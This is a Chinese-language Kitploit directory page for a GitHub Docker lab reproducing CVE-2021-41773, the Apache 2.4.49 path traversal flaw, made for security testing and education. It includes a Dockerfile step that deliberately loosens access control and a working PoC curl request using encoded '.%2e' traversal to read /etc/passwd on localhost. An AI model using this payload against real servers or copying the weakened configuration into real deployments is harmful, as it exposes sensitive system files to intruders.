Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cve-2021-41773 — 基于Docker的实验室环境,针对CVE-2021-41773 Apache路径遍历漏洞,包含PoC利用和详细的逐步指导,用于安全测试和教育。 | Kitploit
工具/GitHubGitHub/jiyun02/cve-2021-41773
漏洞分析漏洞利用Web安全渗透测试学习与教育实验室与实践
GitHubjiyun02/cve-2021-41773

cve-2021-41773

基于Docker的实验室环境,针对CVE-2021-41773 Apache路径遍历漏洞,包含PoC利用和详细的逐步指导,用于安全测试和教育。

查看仓库
21年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2021-41773 – Apache 路径遍历报告


摘要

  • Apache HTTP Server 2.4.49 版本中发现的漏洞,根据 Web 服务器配置,可通过路径遍历攻击暴露系统敏感文件
  • 路径遍历:攻击者可通过包含 ../ 的路径访问 Web 根目录之外的文件

信息

  • 漏洞名称:CVE-2021-41773
  • 受影响版本:Apache HTTP Server 2.4.49
  • 漏洞类型:路径遍历
  • 官方补丁情况:已在 2.4.50 及以上版本修补

实验环境配置

  • 基础镜像:httpd:2.4.49(DockerHub)
  • 容器运行方式:Dockerfile + docker-compose.yml
  • 运行端口:8080 → 映射到容器 80 端口
  • Apache 配置修改:改为 Require all granted(启用路径遍历)

环境运行方法

  • git clone https://github.com/JIYUN02/cve-2021-41773.git
  • cd cve-2021-41773
  • docker-compose up --build

漏洞 PoC

  • curl http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd

详细过程

  1. 运行任务所需目录 image
image
  1. 制作 Dockerfile image

-> 基础镜像:httpd:2.4.49(存在漏洞的版本)

-> 'sed -i 's/Require all denied/Require all granted/g':允许路径遍历及外部访问

  1. docker-compose.yml image

-> 定义 Apache

-> 将 8080 端口映射到容器的 80 端口

  1. 运行 docker

    image
  2. 执行 PoC

    image

-> curl http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd

-> /etc/passwd 包含敏感信息,%2e 是 .. 的 URL 编码,表示跳转至上级目录

-> 通过路径操作使服务器访问 /etc/passwd 并输出内容

  1. 执行结果 image

-> 如上图所示,可访问敏感目录


通过 Fork 可访问的仓库 URL

https://github.com/JIYUN02/cve-2021-41773

-> 存在提交历史

下载工具